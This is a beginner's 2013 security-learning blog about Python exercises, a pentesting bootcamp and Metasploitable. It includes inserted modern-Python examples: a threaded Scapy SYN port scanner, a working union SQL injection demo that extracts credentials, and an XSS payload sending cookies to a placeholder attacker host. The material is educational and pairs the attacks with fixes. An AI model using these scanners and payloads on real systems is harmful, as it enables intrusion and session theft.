Saturday 29 June 2013

SPSE Multiple threading Port scanner - popped the code a decent program cherry

Hi guys, everyone who reads.

As part of the SPSE python course I was tasked with creating a port scanner with Scapy.

The script was to take user input for a range of ports and split it into 10 roughly equal parts, so 1-100 would be 1-10, 11-20, etc. (it is not exactly even, but you get the point).

Each of the equal parts would be placed into its own thread. So a port scanner seemed easy until adding the logic just mentioned. As I state in every post I am a noob at coding so I was already dropping my jaw at the task ahead.


Scapy


The plan was to learn Scapy and how to actually scan a port. Where else would you start, right? I could have started with separating the port range, but at the time that seemed much harder.

The Scapy website can be found here 

"Scapy is a powerful interactive packet manipulation program. It is able to forge or decode packets of a wide number of protocols, send them on the wire, capture them, match requests and replies, and much more." This was the description of what Scapy can do... So reading that I was like oh dear, I am already in over my head and its the 2nd exercise other than the python syntax module.... ARRGH

But remember many a time of being frustrated I calmed my breathing, settled my heart rate and pushed through. How hard can it be if I go slowly right? Right....

Sifting through the documentation was not too bad. I learned so much about what Scapy can do (it is HEAPS), but was trying to find out how to send packets. Whoa.. Whoa, back.. I had to learn how to 'install' it first. I couldn't play with it until it was installed. Thankfully it was pretty easy, once I had the VMs working properly.

NB: Make a post about how the VM's play naughty games on the work laptop. Like they crash all the TIME..


I found the syntax for a SYN scan. Yay! I had installed Scapy, read through the documentation and was finally able to see the program coming together (even if only in my mind). With that I could see that the port would be placed in dport=.


So for a range of ports I would have to create a list and place it into that syntax, so I started with dport=port.

To not jump in too deep, I started off by asking for user input for 1 port, thinking please let this work, then I can slowly work out how to add multiple ports to that syntax.

Thankfully it worked.


For some reason the code is staying in text, not being highlighted in python syntax. Sorry for that!
As you can see its a bit of code.

Multiple threading

My first thoughts were let us try to get 2 threads working, then I can try more. But after having changed it into a for loop there was no need to write multiple threads manually. The number of threads created was determined by the number of times the loop ran, one thread per pass. This was a bit of a logic shift but worked well.

The plan for manually writing the threads first up was to make sure I had my logic down and could create more than one thread correctly, i.e the syntax was correct and it would actually work!

To thread or Threading

So like, in the video we were told to create threads using thread. This is apparently an older, lower-level way to create multiple threads. There is a newer way called threading, notice the difference? Neither did I. But it works!

It is also much easier: from threading import Thread (lowercase module, capital T on the class), then Thread(target=my_function, args=(arg1, arg2)). Totally different from the original thread.start_new_thread(my_function, (arg1, arg2))... Anyhow I struggled using thread (the old way) until I did some research and found out about threading (the new way). It is much more human readable, such as target= and args=. Much easier to understand. One thing to remember: args must be a tuple, so a single argument is written args=(port,) with the trailing comma.

So if you are looking at multi threading, use threading, not just thread.


Extra on the code


Some simple things had to be checked. For example, range(1, 100) in Python gives 1-99, not 1-100, so I had to add 1 to the user's end port.

Placing Start and Stop for each loop allows the user to understand the results from each packet received. I am yet to make it easier to understand, as I do not fully understand the Scapy output, I may one day. But as this was completed for the exercise and will not be used too much (yet to see) I doubt I will improve it much more. It satisfies the exercise and that makes me very happy!
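Here is an added example, not the code from this post or from the SPSE course, of the design described above: the port range is split into ten roughly equal chunks, each chunk gets its own threading.Thread, the worker loops over range(lo, hi + 1) so the end port is included, and results are collected under a lock. The Scapy SYN probe (IP/TCP with flags="S", sr1 for the reply) is the real probe; it needs Scapy and root, so it is imported only when called, and the scanner accepts any probe function so the splitting and threading can be exercised without sending packets. The target address and the hostname in the usage line are placeholders.

```python
"""Threaded SYN port scanner: split a port range into N chunks, one thread each."""
import threading
from typing import Callable, Dict, List, Tuple


def split_range(first: int, last: int, parts: int = 10) -> List[Tuple[int, int]]:
    """Split the inclusive range first..last into up to `parts` contiguous chunks.

    The chunks are "not directly even": the first (total % parts) chunks get one
    extra port. A range smaller than `parts` yields fewer chunks, never empty ones.
    """
    if first < 1 or last > 65535 or first > last:
        raise ValueError("port range must satisfy 1 <= first <= last <= 65535")
    total = last - first + 1
    parts = min(parts, total)
    base, extra = divmod(total, parts)
    chunks = []
    start = first
    for i in range(parts):
        size = base + (1 if i < extra else 0)
        chunks.append((start, start + size - 1))
        start += size
    return chunks


def syn_probe(target: str, port: int, timeout: float = 1.0) -> str:
    """Real probe: send a SYN, classify the reply, then reset any half-open connection.

    Assumption: Scapy is installed and we run as root. Imported here so the module
    loads (and the splitting/threading can be tested) without Scapy present.
    """
    from scapy.all import IP, TCP, send, sr1  # type: ignore

    reply = sr1(IP(dst=target) / TCP(dport=port, flags="S"), timeout=timeout, verbose=0)
    if reply is None:
        return "filtered"            # no answer: dropped by a firewall or host down
    if reply.haslayer(TCP):
        flags = int(reply[TCP].flags)
        if flags & 0x12 == 0x12:     # SYN+ACK: the port is listening
            # tear down the half-open connection so the target does not keep it around
            send(IP(dst=target) / TCP(dport=port, flags="R"), verbose=0)
            return "open"
        if flags & 0x04:             # RST: nothing listening
            return "closed"
    return "filtered"


def scan(target: str, first: int, last: int, threads: int = 10,
         probe: Callable[[str, int], str] = syn_probe) -> Dict[int, str]:
    """Scan first..last against target, one thread per chunk; returns {port: state}."""
    results: Dict[int, str] = {}
    lock = threading.Lock()          # the dict is shared by all workers, so guard writes

    def worker(lo: int, hi: int) -> None:
        for port in range(lo, hi + 1):   # +1 so the last port of the chunk is scanned
            state = probe(target, port)
            with lock:
                results[port] = state

    workers = [threading.Thread(target=worker, args=(lo, hi))
               for lo, hi in split_range(first, last, threads)]
    for t in workers:
        t.start()
    for t in workers:
        t.join()                     # wait for every chunk before reporting
    return results


if __name__ == "__main__":
    import sys
    host = sys.argv[1] if len(sys.argv) > 1 else "127.0.0.1"   # placeholder default
    for port, state in sorted(scan(host, 1, 100).items()):
        if state == "open":
            print(f"{port}/tcp open")
```

Two things the exercise version glosses over: a probe that times out is reported as filtered rather than closed, because silence and a RST mean different things to the person reading the report, and the RST sent after a SYN+ACK keeps the scan from leaving a pile of half-open connections on the target.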


The output from the code is as follows:

[screenshot: asking for port range]

[screenshot: Scapy processing]

[screenshot: some output from the SYN scan]
NB: There was an update suggested by a friend to the part of slicing the list up. Which I will implement but haven't yet.

Hope you guys like???

Cheers
Haydn.,



Tuesday 25 June 2013

SPSE update - Recursive function

Hi all, just a post to myself and to the public to update on how I have been tracking.

Also to grab onto the many bits and pieces of information bouncing around my brain, tracking them down so I do not lose it all!

SPSE Recursive Function

So Module 2 Video 1 asks you to complete an exercise. This exercise is to create a python file that recursively searches a directory and prints the contents out in a hierarchical format.



The following is the code I ended up with

Linking code in a blog can be found here https://gist.github.com/
There is a way through javascript however to directly embed it, I do not have time so this is it for now. It worked but was not able to find the python version.

Anyhow..

First off I had no idea what a recursive function was, so I simply used a loop to go through os.listdir() of all the directories.

A recursive function, as I understand it from friends telling me about recursive factorial functions, is one that hands itself back to itself. Great English, hey.

By that I mean at the end of the function (loop, if, whatever) it passes the value back into the function being called. So if a function used 5 as its value and took 2 away, it would then pass the value 3 back to the function and it would take 2 away again.

This could happen forever, so the function does need a limit/stopping point (termination condition) as well as a reduction factor to allow it to reach that stopping point.
Here are some good suggestions http://stackoverflow.com/questions/479343/how-can-i-build-a-recursive-function-in-python


The following is code that has no termination condition. It would simply loop forever, printing the words hello world and incrementing the number.



Back to the recursive function at the top.

My biggest problem was trying to get os.listdir or os.walk to continue printing the items out without looping back over the directories.

So I wanted code that would list the directories and paths together, so I needed something to store which directories and files had been looked over so that it could be recursive and send that information back to itself. This was to be stored in the newdir array/list, as then it could choose that as the new directory and continue from there.

It would have been: start directory, loop, find directory A with file A in it. Then it starts over and the start directory is now directory A. If there are no more directories, nothing is passed back to the start of the function again, which makes the termination factor clear (it became clear once I had written it).



The above is to do with os.walk. This is the easy for loop for printing out directories and files. It walks through all the directories and subdirectories. My trouble is with the dirtrav code: I was unsure how it walks subdirectories. I had tried for loops with os.listdir but was not able to go into subdirectories. This really frustrated me.

I broke the dirtrav code apart and understand how and why and what it was doing, but still unable to see why. If you delete the for f in newdir loop it does not print out the files within subdirectories, so it must do something there.

**NB get javascript embed code to work, so annoying creating it externally, going into html edit and pasting then coming back out.

Simply put, I Googled code to see if there were any starting points to give me an idea and it came up with the top code, so I spent much time working out different ways to make it recursive. But using the array/list gives a very simple termination factor without using integers, say num - 1 for example. As it is to do with directories and there can be a different number of them, stopping based on integers would never be suitable.

Code output when dirtrav(f) is not deleted:

[screenshot: output with the recursive call in place]

When dirtrav(f) is deleted, i.e. not sent back to itself:

[screenshot: output without the recursive call]

So you can clearly see I have not fully understood the code.

EDIT:!! So as it passes f back into dirtrav, it doesn't print the directory because there is none. It prints the file names... *facepalm*



Hopefully this helped some people out.
Cheers
Haydn




Sunday 23 June 2013

Getting Fat, Being Lazy and all things I wish I wasn't

Hi Everyone! How are you guys doing?

This post is to remind myself to get back on the wheel of 'life' and continue running instead of walking.
I.E Taking responsibility for what I eat, what I do, how I study.

Each day is gone, disappeared. It flies through without me having much control. I have been holding on for the ride. I assume many people do these days, or at some point in their life become stagnant like myself. But I have decided NO MORE.

Plan to not be 'Fat'

I am not fat in the sense of being obese, or not fitting any old jeans anymore. I am fat in that I have grown a bit of a belly, my cardio is not as it used to be, by that I mean non-existent. Drilling at Jiu Jitsu is not the pleasure of pain it used to be, it is now all fours on the ground gasping for air at the end. Being drained and knowing you have pushed through a barrier versus fighting with your fitness is very different.

Plan to study properly  - paying attention

I am finding I am either not as smart as I once was (many would argue I never was) or my attention is not as strong.

Working through the SPSE (securitytube python course) is taking much longer than I thought. The time I do get to study is not being as fruitful as I first thought. I flick to Facebook too easily, I fight trying to install Ubuntu on VirtualBox and VMware Player, though that can be justified by VirtualBox running like a snail.

It just seems that the speed at which I used to learn in year 9 has dramatically slowed. I used to be so attentive, the student with the hand up first to answer the question (at risk of being bullied). Now it is like study or waste time. Generally the waste time option wins.

I know I know, its not good for my future, I want to be a pen tester and to do that as a job I need to do a certain amount of hours, if I want to be better at anything I must put in the time. I know all this, but execution is my downfall, I am like the person that knows the best technique to do anything, I just don't...

I want to stop this!

Each day, what where?!

Days go by, over and over. I have been at my graduate job almost 4 months now, amazing. I am so happy I have passed my probationary period. Things go by so quickly. I have been really bad with routines.

My training routine for Jiu Jitsu (more mental than on paper) has stopped. Last week I only got to training once! So so so bad of me.


From here we go up

As I am sure everyone has troubles like this, I am attempting to catch it before it gets really bad.

Mondays at work I am planning to get to Jiu Jitsu for lunch and afternoon, that would be amazing. I only have to stay back a little bit later or start a bit earlier. Since Jits is at 6 30pm its quite easy to do. I want to add in more weight training at some points.

For study, I am going to make a plan for each session, even if 30mins, what am I doing it for, what is the focus etc etc.

My weight.. Hmm my weight, hopefully Jitsu takes care of that, but I am going to employ Lite n Easy I think. The last thing I want to do is go home and have to cook, some people love cooking and it relaxes them, but that is just not for me.

So that is the plan so far?! Let me know if you guys have any tips and tricks. Like I said earlier I am great at googling, using websites, having the knowledge, but execution lacks..

Hopefully this post kicks my butt!

Cheers
Haydn


Monday 17 June 2013

Python Plans + Tuesday - is worse than Monday

Tuesday Mornings....

The day is not horrible. The day is great. The horrible thing is leaving your nice warm bed while being cuddled by 2 big dogs.

I hit the snooze button so many times that 30 minutes passed. I am lucky I always get an early train for the reason of sleeping in. Good planning I say!

I had an hour + train ride, was great to sleep!

Anyhow to the real reason for the post

Python! Specifically SPSE - more specifically Security Python Scripting Expert.


In my plan to gain practical skills while at full time work, I plan to complete the above course from http://www.securitytube.net/

The course link is here.

Now if you have read any previous posts, you must know that I have a love-hate relationship with programming. More so I am too stupid to learn it. Anyhow, in my last post I was completing my way through learnpython.org and stopped at generators. I thought having the basics down would be a great time to start the SPSE course.

The first module of the course is a quick run through the syntax. A very quick run through I might add. So if you plan on attempting this course, please do have the basics of Python, or have the time to learn it as you go, which is what I plan to do.

Module 2 so far is reading and writing files, which I assume will be used quite often during the course. There is an exercise to write code that reads out all directories and files back to you. Pretty nifty, pretty awesome, and if you do not do it correctly it prints out in an incomprehensible way. So newline is a good thing to put.

So I plan to complete the SPSE course, originally by the end of June (12 days left), but now end of JULY I HOPE!. I need to finish it.



Cheers,
Haydn



Sunday 16 June 2013

Sunday night sleep - bed space

This post is not IT related. It is to express the little bed space I normally sleep with.

My German Shepherd X and my Rottweiler take up a fair chunk of the bed.

The missus is not here so thankfully I have some room :)

How do you guys sleep?

This was also to test out blogger on my phone. Here are 3 photos to go with it. My eyes are burning from the flash....

Cheers
Haydn

Saturday 15 June 2013

Saturday Study - very little, a fight to learn something basic

How Saturday started


Like everyday I have big plans for learning on the weekend.
Like most Fridays I stay up late watching youtube videos..

The Result = waking up late and having little motivation!! Does anyone else sympathize?

Python
My plan for today was to learn some python. I have a long hate relationship with coding, so python is my way to force it into a friendship

I have been going through www.learnpython.org, which is a great free interactive python tutorial websites. Lots of tutorials great for beginners like me!!!

So I have been plowing along, and came to the functions section. All nice and easy, but wait: functions within functions and then a 3rd function calling the prior 2, of which the 2nd would add a string onto the result of the first function. Complicated enough for you? Don't worry, I was like "jaw drop".

Anyhow good news I passed it... After being like wtfomgbbq.

 The exercise was:

Exercise

In this exercise you'll use an existing function, and while adding your own to create a fully functional program.
  1. Add a function named list_benefits()- that returns the following list of strings: "More organized code", "More readable code", "Easier code reuse", "Allowing programmers to share and connect code together"
  2. Add a function named build_sentence(info) which receives a single argument containing a string and returns a sentence starting with the given string and ending with the string " is a benefit of functions!"
  3. Run and see all the functions work together!
     



 self note: OMG the copy paste works amazing in BACKTRACK


# Modify this function to return a list of strings as defined above
def list_benefits():
    pass

# Modify this function to concatenate to each benefit - " is a benefit of functions!"
def build_sentence(benefit):
    pass

def name_the_benefits_of_functions():
    list_of_benefits = list_benefits()
    for benefit in list_of_benefits:
        print(build_sentence(benefit))

name_the_benefits_of_functions()

in which the answer was

# Modify this function to return a list of strings as defined above
def list_benefits():
    return ["More organized code", "More readable code", "Easier code reuse", "Allowing programmers to share and connect code together"]
# Modify this function to concatenate to each benefit - " is a benefit of functions!"
def build_sentence(benefit):
    return benefit +" is a benefit of functions!"

def name_the_benefits_of_functions():
    list_of_benefits = list_benefits()
    for benefit in list_of_benefits:
        print(build_sentence(benefit))

name_the_benefits_of_functions()

Now the red + sign was the hardest part. Like the answer looks obvious and bloody easy.

I originally had  the function 

# Modify this function to concatenate to each benefit - " is a benefit of functions!"
def build_sentence(benefit):
    return benefit ," is a benefit of functions!"

Now having a "," instead of a "+" gives a massively different output.

Instead of the first function string having the 2nd function string concatenated together  which you think would happen. It turns into a bloody tuple!!  As a beginner I was stunned, that was the omgwtfbbq moment, over and over I could only get the tuple printed out, it would include both strings with brackets around them with single quotes. So a tuple of the objects, instead of the objects. Not sure if I used the correct terminology.

So you can see the difference. Which seems quite obvious, but to a beginner the trials and tribulations to understand it were not obvious. I asked a good friend on Facebook for advice, he is much more skilled and established than I.

Hopefully this post helps other noobs to understand that many simple things will make you *facepalm* yourself when you figure it out...

Cheers Haydn


Monday 10 June 2013

2nd Day - 2Day beginners Pentesters Boot Camp Weekend

Hi all,

So I did the 2nd day of the course. The focus on web applications. Yay some stuff I knew! Because I have some grounding in the area I feel more in a position to give a balanced review of the 2nd day. Not to say I didn't give a balanced view of the 1st day, but I can give a better idea if it was beginner or not.

2nd Day Review

The course was to go through the basics of XSS and SQLi and some Burp Suite.


Copy & Paste from Day 1
----The course was through strategicsec with Joseph Mcray whose twitter is @j0emccray, having to manually link it because the Twitter could not find him.. The website/company he runs is http://strategicsec.com/.

Pentesters Weekend Bootcamp:
http://strategicsec.com/services/training-services/online/pentesters-workshop/----

SQL Injection

The SQLi was very basic, but it came with strong explanations. I even learnt that when testing for SQLi there is a difference between placing a quote before the ORDER BY and not placing a quote. The answer being: integer parameters do not need the quote and string parameters do, in order to break out of the quoted string and test it.

The instructor covered blind SQL injection, basic SQL injection and union-based injection. He did this in a step by step approach, allowing your understanding to be stretched appropriately. He even explained time-based injection with a demo, although he did not spend much time on this; I think it may have been too advanced for the course.

So ultimately the most advanced it went was union select, using the order by to find the number of columns first. Then in one of the  columns that would show on screen we could extract data, such as @@database, user() etc etc. With the line in the URL bar being: ?id=1' union select 1,2,3,4, @@version --+

Not sure of the exact number of columns but you get the idea.

It did not go much more advanced than that. There was no explaining that the list of tables in a MySQL database is available from information_schema.tables, and the columns from information_schema.columns, allowing further information extraction.

So in having a background, the SQL was a refresher for me, however I think it was suitable for the course and was explained quite well. Leaving enough out for students to go research themselves.

If any other students are reading this; a great free sql tute with videos is SQLi-labs by Audi-1.
It is run through PHP in Apache within whatever OS you set it up with. I did it in backtrack worked a treat.
https://github.com/Audi-1/sqli-labs
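An added example (not from the bootcamp's lab) that plays out the steps above against an in-memory SQLite database: a query built by pasting the request parameter into the SQL text, ORDER BY probing to find the column count, a UNION SELECT that puts the interesting expression in a column that is displayed, and the same lookup with a bound parameter, which the same payload does nothing against. The bootcamp target was MySQL; here sqlite_version() stands in for @@version and sqlite_master for information_schema.tables, and the trailing comment is -- rather than --+. The table contents are constructed sample data.

```python
"""Union-based SQL injection against a string-built query, beside the parameterized fix."""
import sqlite3
from typing import Callable, List, Tuple


def build_db() -> sqlite3.Connection:
    """Constructed sample data: a four-column products table and a users table to steal from."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE products(id INTEGER, name TEXT, price TEXT, descr TEXT);
        INSERT INTO products VALUES (1, 'widget', '9.99', 'a widget');
        INSERT INTO products VALUES (2, 'gadget', '19.99', 'a gadget');
        CREATE TABLE users(id INTEGER, username TEXT, password TEXT);
        INSERT INTO users VALUES (1, 'admin', 's3cret');
    """)
    return db


def lookup_vulnerable(db: sqlite3.Connection, product_id: str) -> List[Tuple]:
    """What the bootcamp target did: ?id= goes straight into the SQL text.

    Integer column, so no quote is needed to break out (the page's point).
    """
    query = "SELECT id, name, price, descr FROM products WHERE id=" + product_id
    return db.execute(query).fetchall()


def lookup_fixed(db: sqlite3.Connection, product_id: str) -> List[Tuple]:
    """Same query with a bound parameter: the input is data and can never become SQL."""
    try:
        id_int = int(product_id)       # integer column: refuse anything that is not a number
    except ValueError:
        return []
    return db.execute(
        "SELECT id, name, price, descr FROM products WHERE id=?", (id_int,)
    ).fetchall()


def find_column_count(db: sqlite3.Connection,
                      lookup: Callable[[sqlite3.Connection, str], List[Tuple]],
                      max_cols: int = 10) -> int:
    """ORDER BY n probing: the first n that errors is one past the column count."""
    for n in range(1, max_cols + 1):
        try:
            lookup(db, f"1 ORDER BY {n}--")
        except sqlite3.OperationalError:    # "ORDER BY term out of range"
            return n - 1
    return max_cols


def union_payload(cols: int, exprs: List[str], source: str = "") -> str:
    """'0 UNION SELECT 1,2,...,expr FROM source--' with exprs in the last columns.

    id=0 matches no real row, so the only rows returned are the injected ones.
    """
    filler = [str(i) for i in range(1, cols - len(exprs) + 1)]
    from_clause = f" FROM {source}" if source else ""
    return "0 UNION SELECT " + ",".join(filler + exprs) + from_clause + "--"


if __name__ == "__main__":
    db = build_db()
    cols = find_column_count(db, lookup_vulnerable)
    print("columns:", cols)
    print("version:", lookup_vulnerable(db, union_payload(cols, ["sqlite_version()"])))
    # sqlite_master plays the role information_schema.tables plays on MySQL
    print("tables:", lookup_vulnerable(db, union_payload(cols, ["name"], "sqlite_master WHERE type='table'")))
    print("creds:", lookup_vulnerable(db, union_payload(cols, ["username", "password"], "users")))
    print("fixed:", lookup_fixed(db, union_payload(cols, ["username", "password"], "users")))
```

For a string parameter (the page's ?id=1' form) the payload would open with a quote, 0' UNION SELECT ..., so that the injected text lands outside the quoted literal; the probing and column-matching steps are otherwise the same.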


XSS

<script>alert(123)</script> was shown in a webpage that was specifically vulnerable to XSS. This will be great for students to play around with and see what can be done. Was the basics as well, very suited to the class.

The result of what XSS can do other than just a pop up I found was really important. A webpage where the XSS would send information to was able to be accessed. So as simple as seeing that session cookie information could be sent somewhere else was really great. Especially when as a Penetration Tester we must explain the outcome of a vulnerability, this was great to see.
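An added example, not from the course, of the difference between the alert(123) payload and one that does what the post describes, and of what stops it: the same page rendered with the search parameter echoed raw, and rendered through html.escape. The collector hostname attacker.invalid and the page itself are placeholders constructed for the example.

```python
"""Reflected XSS: a page that echoes a parameter raw, next to the same page with output encoding."""
import html
from urllib.parse import urlencode

# Constructed payload: instead of a pop-up it ships document.cookie to a collector
# the attacker controls. attacker.invalid is a placeholder hostname.
COOKIE_STEALER = '<script>new Image().src="http://attacker.invalid/c?"+document.cookie</script>'


def render_vulnerable(query: str) -> str:
    """Reflects the parameter into the HTML body with no encoding."""
    return "<p>You searched for: " + query + "</p>"


def render_escaped(query: str) -> str:
    """Same page, but <, >, &, ' and " are encoded, so the browser sees text, not markup."""
    return "<p>You searched for: " + html.escape(query, quote=True) + "</p>"


def contains_script(page: str) -> bool:
    """Crude check a tester can run on a response: did a raw <script> element survive?"""
    return "<script" in page.lower()


def attack_url(base: str, payload: str) -> str:
    """The link the victim would be sent: payload URL-encoded into the q parameter."""
    return base + "?" + urlencode({"q": payload})


if __name__ == "__main__":
    print(attack_url("http://target.invalid/search", COOKIE_STEALER))
    print("vulnerable:", render_vulnerable(COOKIE_STEALER))
    print("escaped:   ", render_escaped(COOKIE_STEALER))
```

html.escape is the right tool for text dropped into the HTML body or a quoted attribute; a parameter that ends up inside a script block or a URL needs encoding for that context instead. Marking the session cookie HttpOnly stops document.cookie from reading it, but the injected script still runs, so it is a mitigation for this particular payload, not a fix for the XSS.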

Burp Suite
Unfortunately this was not gone through; we finished an hour and a half early, so I am not sure why. However we were informed that another session would be made available before the end of the month. Hopefully this is true. I will come back and update if this is covered.

I understand it was only $100, but the course description covers it and it's a paid service. Other than that the course was great, delivered well, and the course material was supplied.


Update: There is going to be another day added to the course, this is to cover the Burp Suite and LFI that were missed originally. This is great news, as it shows the instructor cares about what we learn and what he sets out to do, also keeping to his work (aka the course description). So more time covered on the original topics and extra time for those that were missed, is a win win for me.

The Labs + Virtual Machines
Having played with the labs a bit, for the web app side it includes vulnerable web pages which is really great for beginners (like me) to play around with.

The virtual machines given were custom XP, Windows 7 and Ubuntu, working really great so far!

I would certainly recommend this course. I need to upskill in the network scanning so I can test that out a bit more. But a fantastic course.

Cheers guys


Saturday 8 June 2013

2 Day Beginners Online Instructor-led Course - Review

Hi everyone,

Sorry for no post since Wednesday. The week flew! You know those weeks you wake up Monday dreading it, each day is a struggle, then bang its the weekend, and already the weekend is almost over?? Yeah.. one of those weeks.

So I have been very excited to do this $100 (yes that was the price!) course, that has 2 days of 5 hours instructor-led on network scanning and web application testing. It also comes with lab access until the end of June. Fantastic for $100 bucks I say.

The course was through strategicsec with Joseph Mcray whose twitter is @j0emccray, having to manually link it because the Twitter could not find him.. The website/company he runs is http://strategicsec.com/.

Pentesters Weekend Bootcamp:
http://strategicsec.com/services/training-services/online/pentesters-workshop/

So this course I signed up for seemed great, I even posted on twitter asking if it was for beginners and was told it was. Was the course for beginners you may ask? Definitely yes, but also no. No because holy moly there was some stuff that was over my head, but in saying that there is no point doing a course to learn what you already know.

It was a little over my head, but you have resources to go through later; the instructor-led time is recorded and given to you, so you can go back, rewind, pause, rewind again (I am sure I will do that many times) and follow along at your own pace.

Different Topics
We covered many topics for Networks. External scanning, internal scanning, Metasploit and lots of other stuff. Additionally what to do once into a system, such as creating administrator rights.

HTTP load balancing and what to do if that is the case was great to see; it was important to understand what to do before you even compromise a system, as this can save so much time over just taking pot shots off into nowhere trying to compromise.

The instructor Joseph was friendly and involved the online students interactively; we finished an hour and a half early because there were not as many questions as normal. Which is a good thing, allowing so much time for student questions and interactivity really makes the day stand out.

Death by power point?
The well known death by PowerPoint was avoided; a mix of PowerPoint and live demos was used. The live demos were run through very quickly, although it probably only felt that way because for us Aussies it was midnight to 5am, a hard time to focus at the best of times. However in saying that the presentation was recorded, and the magic notepad he used for all the commands was to be supplied as well.

So over all a great first day (night for me). I have not had experience with other instructor lead webinars before, but have youtubed many a course. So far I already feel the $100 is great value. It will be most worth it if I make use of the labs as much as possible.

Look forward to tonight's web app section!!

Hope you enjoyed my quick review.

Cheers
Haydn



Wednesday 5 June 2013

Metasploitable - dislike! Hard for newbie to learn

Hi Guys,

Just a quick post while I am on the train to work, yes work, so much fun! Actually hopefully I can finish this work paper today and then get more involved on a source code review, fingers crossed.

Anyhow this post is about my dislike for the Metasploitable documentation, especially coming from a newbie.

I will cut to the chase and say its because most of the stuff they do and show in the documentation DOES NOT work on the VM. Why have all this documentation that is supposed to be specific to the vulnerable Vm that they specifically MADE and not have it directly link to the VM.. ungh so silly and so frustrating.

It would be like having a bowl of soup and trying to eat with a fork.. Pointless. Bad analogy I know, I am very bad at them.

This problem happens from early on, by early on I mean I did not bother going past information gathering. How bad is that! Or perhaps lazy of me to see if the documentation got better.

Now the documentation explains how to use a password sniffer, which is great, but if you use it on the VM it fails; it barely gives any output or feedback in the terminal, so I must assume it did not find a password. Then SNMP sweeping is not worth going through either. The beautiful and useful output in the screenshots, which is great for learning I might add, is not able to be replicated in the VM. Which is terrible, I like to be tactile and learn by DOING, but no, you can't.

Being a newbie and having no direct path for ethical hacking, coming across the Metasploitable documentation was too good to be true. So far it is! No direct path is great in that you are free to learn what you choose and find what is relevant for you, however no path at all creates a big opening to spend more time searching than learning (which I have done quite a lot). As such I am finding you need a great passion and great persistence with learning for this industry.

So I appear to have come to a love hate relationship with the Metasploitable documentation, it can give you a taste of how to, but not directly onto the VM, so perhaps it is worth googling and playing around, which is the idea of 'hackers' hey. If it was easy, everyone would do it!.


Hope this comes as a warning for newbies who wish to jump in on Metasploitable. Good Luck!... and be patient

Cheers
Haydn

Sunday 2 June 2013

Sunday Night Metasploit-ing

 Hi all, so I began sitting down and going through the Information Gathering part of Metasploitable, very interesting, very much over my head. Oh well, you have to learn somehow, right?

Issue with Metasploitable: The thing I find with Metasploitable, being so new, is that they do not test on the actual VM. It will be random IP addresses, many of which are multiple. I know this because the default IP address for Metasploitable is 192.168.56.101. I proceeded anyway, and just put in the VM IP; it is good though to see how it works with multiple IPs.

It would be so great if it was the VM that all the documentation was taken on. That way if something goes wrong, I can quickly see if its my misunderstanding (which I am sure happens alot!) or something else.


 So here I have just completed, gone through quickly, not a full understanding of the information gathering section.

Information Gathering:

This I understand is a very important skill for pen testing/hacking, or whatever you wish to do. Research is really important for anything really, it allows you to understand what you have, what you could do or want to do and really 'prepare'.

It saves heaps of time in the long run, like LOADS. A lame analogy I have come up with is a locked box, spending ages trying to break the lock, when if you have looked around it first you would have seen the button to open it. Lame I know, but gets to the point really quickly.

So Metasploitable takes you through many but not all (as it states) of the different ways to scanning. Starting with the popular NMAP, through to SSH, TCP and FTP.

Most basic fundamentals that I think most of everyone has, but good for me to go through again.

So as I frantically go back to the website to remember what I did, the first page was Port Scanning.

Port Scanning
In order to talk to someone, you must agree on how to interact, generally speaking. Just like humans, applications and networks require an accepted way to interact; this is generally done via ports, and by generally I mean it is a requirement. This helps uniquely identify the application that wants to communicate.

So perhaps I used a bad analogy. But the idea is in there sort of. A better one after writing I have come to think of, its like a 2 way radio, unless you are on the same channel you cannot communicate. You could be communicating with some random person and not realize..

Nmap was used first up. I understand it is very popular, and to many the scanner of choice.

I do not fully understand the syntax, but it is on my to-do list. I have the hakin9 magazine devoted to it, which I plan on reading on the commute to and from work. This hopefully amazing magazine can be found at
http://hakin9.org/tag/hakin9-nmap/

Metasploit quickly runs you through nmap, and then shows you db_nmap, which runs the same scan but stores the results in the Metasploit database, which is really useful.

I learned that running a really wide scan will either crash what you are scanning or stop your internet connectivity altogether.I am unsure if this is due to Backtrack being run in a VM, but when I scan just the IP on the Metasploitable VM nothing crashes :).

Other types of scans within the Msfconsole:
Pages I am writing about here

 I learned to scan SNMP devices, ftp and ssh

All can be found at

(manually typing because Blogger copies and pastes the text as it is in the web browser, but does not allow me to get back to my normal font and size?!?)

msf > use auxiliary/scanner/<scan type>/<module>

This is really useful, very basic for a noob like me to understand.

Simply typing show options is beautiful!

Metasploit does not explain in too much depth why you need to scan, but then it would be called 101 scanning and not a Metasploitable tutorial. It really shows the flexibility of it, and the ease of use.

My posts are getting extremely long quickly, so I will stop here.
Not much info, more like a review, but it helps me quite immensely.

If you like reading let me know, if not let me know WHY :).


 Note: Maybe I should start thinking about why I want to do each blog, the aim etc. That way I do not ramble on!

Cheers
Haydn